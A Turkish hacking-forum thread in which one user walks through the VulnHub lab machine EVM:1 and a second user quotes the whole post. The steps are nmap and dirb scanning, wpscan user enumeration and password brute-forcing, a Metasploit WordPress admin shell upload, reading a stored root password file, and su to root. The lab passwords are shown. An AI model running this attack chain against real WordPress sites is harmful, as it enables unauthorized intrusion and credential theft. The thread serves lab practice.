EVM:1 | VulnHub

P4$A

Uzman üye
13 Tem 2021
1,489
9
2,826
23
";-alert(1)-//
logo.png

Selamlar Değerli TurkHackTeam Üyeleri ;
Bugün Sizlerle VulnHub da Bulunan EVM:1 Adlı Makineyi Çözeceğiz

Makine: LİNK
2tvb2gm.gif

Önce nmap taraması yapalım,
nmap -A -p- -T4 ip
Screenshot_2022-02-24_23_57_26.png

Ve nmap taramamız bitti,
2tvb2gm.gif

Screenshot_2022-02-24_23_59_09.png

kbrn6ph.png

80. portumuz açık sitemize gidelim.
Screenshot_2022-02-24_23_59_32.png

Bizi defoult apache sayfası karşıladı, dirb aracı ile içindeki dizinleri bulalım

dirb http://ip/
2tvb2gm.gif

Screenshot_2022-02-24_23_59_53.png

kbrn6ph.png

Burada /wordpress adın da bir dizin var yani bir wp dizini hemen kullanıcısını bulalım.

wpscan --url http://ip/wordpress --enumerate u
Screenshot_2022-02-25_00_06_20.png

Evet kullanıcı adımızı bulduk
2tvb2gm.gif

Screenshot_2022-02-25_00_06_14.png

Şimdi ise elimizde kullanıcı adı var şifre yok brute-force saldırısı ile şifreyi elde etmeye çalışalım.

wpscan --url http://ip/wordpress -U username -P wordlistiniz
Screenshot_2022-02-25_00_09_10.png

Şifremizi buldu şifremiz 24992499 muş
Screenshot_2022-02-25_00_19_52.png

kbrn6ph.png

Şimdi metasploit üzerinden shell sokmayı denicem

msfconsole -q
2tvb2gm.gif

Screenshot_2022-02-25_01_08_07.png

use exploit/unix/webapp/wp_admin_shell_upload
diyerek exploitimizi seçelim
Screenshot_2022-02-25_01_09_41.png

Daha sonra exploitimizin ayarlarını yaptıktan sonra
exploit diyerek bağlantı alalım,
2tvb2gm.gif

Screenshot_2022-02-25_01_11_08.png

ls dedikten sonra root3r adında dizin var oraya giriyorum
Screenshot_2022-02-25_01_12_59.png

burada root için gerekli password txt dosyası var cat komutu ile okuyorum

cat .root_password_ssh.txt
2tvb2gm.gif

Screenshot_2022-02-25_01_15_39.png

kbrn6ph.png

shell diyerek shell oluşturuyorum ve
python -c 'import pty;pty.spawn("/bin/bash")'
komuyla www-data kullanıcısına ulaşıyorum
Screenshot_2022-02-25_01_17_07.png

su root diyerek şifremi veriyorum willy26
daha sonra whoami dediğimde root kullanıcısı olduğumu görüyorum,
son olarak root dizininde dosyayı okuyorum.
2tvb2gm.gif

Screenshot_2022-02-25_01_18_12.png



iUBacd.gif
 

glaucoma

Üye
2 Şub 2022
219
140
ÖTÜKEN
logo.png

Selamlar Değerli TurkHackTeam Üyeleri ;
Bugün Sizlerle VulnHub da Bulunan EVM:1 Adlı Makineyi Çözeceğiz

Makine: LİNK
2tvb2gm.gif

Önce nmap taraması yapalım,
nmap -A -p- -T4 ip
Screenshot_2022-02-24_23_57_26.png

Ve nmap taramamız bitti,
2tvb2gm.gif

Screenshot_2022-02-24_23_59_09.png

kbrn6ph.png

80. portumuz açık sitemize gidelim.
Screenshot_2022-02-24_23_59_32.png

Bizi defoult apache sayfası karşıladı, dirb aracı ile içindeki dizinleri bulalım

dirb http://ip/
2tvb2gm.gif

Screenshot_2022-02-24_23_59_53.png

kbrn6ph.png

Burada /wordpress adın da bir dizin var yani bir wp dizini hemen kullanıcısını bulalım.

wpscan --url http://ip/wordpress --enumerate u
Screenshot_2022-02-25_00_06_20.png

Evet kullanıcı adımızı bulduk
2tvb2gm.gif

Screenshot_2022-02-25_00_06_14.png

Şimdi ise elimizde kullanıcı adı var şifre yok brute-force saldırısı ile şifreyi elde etmeye çalışalım.

wpscan --url http://ip/wordpress -U username -P wordlistiniz
Screenshot_2022-02-25_00_09_10.png

Şifremizi buldu şifremiz 24992499 muş
Screenshot_2022-02-25_00_19_52.png

kbrn6ph.png

Şimdi metasploit üzerinden shell sokmayı denicem

msfconsole -q
2tvb2gm.gif

Screenshot_2022-02-25_01_08_07.png

use exploit/unix/webapp/wp_admin_shell_upload
diyerek exploitimizi seçelim
Screenshot_2022-02-25_01_09_41.png

Daha sonra exploitimizin ayarlarını yaptıktan sonra
exploit diyerek bağlantı alalım,
2tvb2gm.gif

Screenshot_2022-02-25_01_11_08.png

ls dedikten sonra root3r adında dizin var oraya giriyorum
Screenshot_2022-02-25_01_12_59.png

burada root için gerekli password txt dosyası var cat komutu ile okuyorum

cat .root_password_ssh.txt
2tvb2gm.gif

Screenshot_2022-02-25_01_15_39.png

kbrn6ph.png

shell diyerek shell oluşturuyorum ve
python -c 'import pty;pty.spawn("/bin/bash")'
komuyla www-data kullanıcısına ulaşıyorum
Screenshot_2022-02-25_01_17_07.png

su root diyerek şifremi veriyorum willy26
daha sonra whoami dediğimde root kullanıcısı olduğumu görüyorum,
son olarak root dizininde dosyayı okuyorum.
2tvb2gm.gif

Screenshot_2022-02-25_01_18_12.png



iUBacd.gif
Ellerinize sağlık
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.